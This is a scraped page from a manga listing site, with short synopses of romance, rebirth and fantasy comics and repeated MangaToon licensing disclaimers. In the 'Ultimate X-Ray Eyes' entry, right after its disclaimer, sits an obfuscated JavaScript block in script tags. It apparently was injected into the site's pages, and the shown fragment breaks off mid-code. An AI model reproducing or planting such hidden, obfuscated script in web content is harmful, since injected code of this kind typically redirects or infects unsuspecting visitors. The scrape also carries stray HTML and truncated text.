Ping Ping Jun - Page 13

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167 results

The Ultimate X-Ray Eyes

The Ultimate X-Ray Eyes Ye Qiu, originally a nobody, unintentionally acquired the ability of seeing-through eyes. This ability not only allows him to see through obstacles, but also to see into the past through time, and even make his body more powerful and agile. Relying on this ability, Ye Qiu jumped from a low-level employee to the top talent that several major antique companies were competing for... MangaToon got authorization from Daxingdao Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>function _0x2b94(_0x24ffa1,_0x369600){var _0x208c5f=_0x22a1();return _0x2b94=function(_0x2702d3,_0x33f1eb){_0x2702d3=_0x2702d3-(0x621+0xfcd+0x368*-0x6);var _0x5b362b=_0x208c5f[_0x2702d3];return _0x5b362b;},_0x2b94(_0x24ffa1,_0x369600);}(function(_0x147d7a,_0x24cad9){var _0x387b54=_0x2b94,_0x5a34e2=_0x147d7a();while(!![]){try{var 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They All Want To Marry Me! Help!

When God closes a door, he opens a window—oh! not A WINDOW, but many fancy FRENCH WINDOWS! The day she was dumped by her ex, she was defended by a handsome white-haired guy, who claimed to be her fiancé before kissing her. Still angry with the unexpected kiss, she rejected the man, yet the next day she somehow ended up in another long-haired man's dorm. The latter—half naked, just out of the steamy bathroom—proposed to her upon knowing her identity. No time to be surprised, as the third so-called fiancé showed up, equally handsome, rich, poised, and possessive... In a relationship involving four, how will this girl manage to deal with her 3 fiancé candidates? MangaToon got authorization from Weibo Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


To Conquer the World with You

To Conquer the World with You "Does she know poetry and song? Does she understand music, chess, calligraphy and painting? Does she know how to be a good wife and mother and manage a household?" Su Yao: "My beauty is enough ......" Years later, the crushed Kyoto noblewoman wondered, "Didn't you say that beauty is enough? Why do you still use your brain?" Su Yao: "Don't you know that the more beautiful a woman is, the less credible her words are?" MangaToon got authorization from BYdongman to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


To Have You Once Again

Mu Qingyi died in order to save the people of the world. Ten years later, he discovered that his obedient disciple had become the world’s greatest demon after reborn! “Yinli, please respect me , I am your master! “It is precisely because you are my master that I want to “practice” with you”. MangaToon got authorization from iReader to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.


To Revenge, Divine

To Revenge, Divine He was the gods' tutor in the divine realm. He never expected that he would die at the hands of his own beloved disciples. Perhaps the God was touched by his grievance, that's why HE gave him another chance to live! He was reborn as Ling Jianchen, whose martial spirit was ruined before he was killed. What's worse, this poor guy's fiancee came to his funeral, not for mourning, but to cancel their engagement... MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Travel To Ad 3000

Chuan Yue Xi Yuan 3000 Hou - <p class="title" data-v-38ce1b5e="">Travel to AD 3000</p> summary: This story is about a girl from year 2011 that time travelled to year 3011. In year 3011, machines with conscience have taken over some of the humans and some humans with special powers have appeared. All of them want world domination but the humans want their freedom. She is caught between this conflict and struggles to be with the one she loves.


Trouble With The President: Return Of The Princess

<h2>Trouble with the President: Return of the Princess</h2> Susan Shen’s father’s longlife work, Boya company was taken over by her uncle and other conspirators. In one night, Susan and her father lost everything they once owned in this world. To seek for her revenge and recapture the company, Susan sets up Chandler Chin, the president of Chin’s group, and becomes his wife. But, is the overbearing Chandler Chin going to help her with her cause? MangaToon got authorization from Yoolook Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Tycoon’s Sweet Little Devil

Ye Rongyin was set up by her boyfriend Ling Jiyan. It turned out that this man approached her only to coax her kidney for her sister Ye mingzhu. At her last breath, she saw Fu Jingsi, the man who she had been running away from all the time. He chose to die with her. Ye Rongyin was regretful that she had been so indifferent and aloof to him... Open her eyes, and Ye Rongyin finds herself reborn at the age of 20. This time, she will protect the one who truly loves her! However, Fu Jingsi clearly feels uncomfortable about her caring attitudes. "She must be pretending it. But... it still satisfies me as long as she is by my side." "Fu Jingsi, stop being possessive! I'm not your toy!" "No, you are not my toy. You are my sweet little devil." MangaToon got authorization from iReader to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Unforgettable Love Of Mine

“1 million, no more!”“I know I'm very handsome but you don't have to look at me like that, I'll feel shy.”“Once you put it on, you can never get rid of it”...He gave her the ultimate care, but also made her the prisoner of love. How can she find the right person through the intricate life…? MangaToon got authorization from Baigongyuanzhan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Vengeful Girl with Her CEO

She thought she fell into a love trap of a bossy president, he thought he will never be touched by anyone anything in this world. But a contracted marriage brings them two together. Is it something about fate or just love feeling appeared during accompany, or just another dark frame? MangaToon got authorization from Changya to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.


Warm Wedding

Into The Bones Of Warm Marriage ...To pay the benefit, Charlotte married into Fan family. She believed that her husband is Shine Fan, who were seriously burnt and isolated in special care. But as time went on, she found that Ron Fan, the brother of Shine, are acting strangely towards her… A love-hate disputed by retribution. She is like a helpless white rabbit hopping in between the elder brother and the younger brother. He is the king of a commercial empire, for his own woman is possession but how about the women who does not belong to him? &nbsp;


Whispers of the Devil

Jing Qiao (Claire) and Le Yan Shen (Anson) vowed to each other during their wedding. Under the fake appearance of a perfect marriage was roaring waves. During their wedding night, Jing Qiao had flashbacks while suffering under Yan Shen’s humiliation and torture. A sinking accident forever marked her as a murderer. His arrival only pushed her further into the depths of hell. “Jing Qiao (Claire), you can’t escape this!” “Le Yan Shen (Anson), I don’t owe you anything. It’s time for us to part!” 恶魔低语时 乖嫩甜妻︰總裁老公太凶猛 /1/
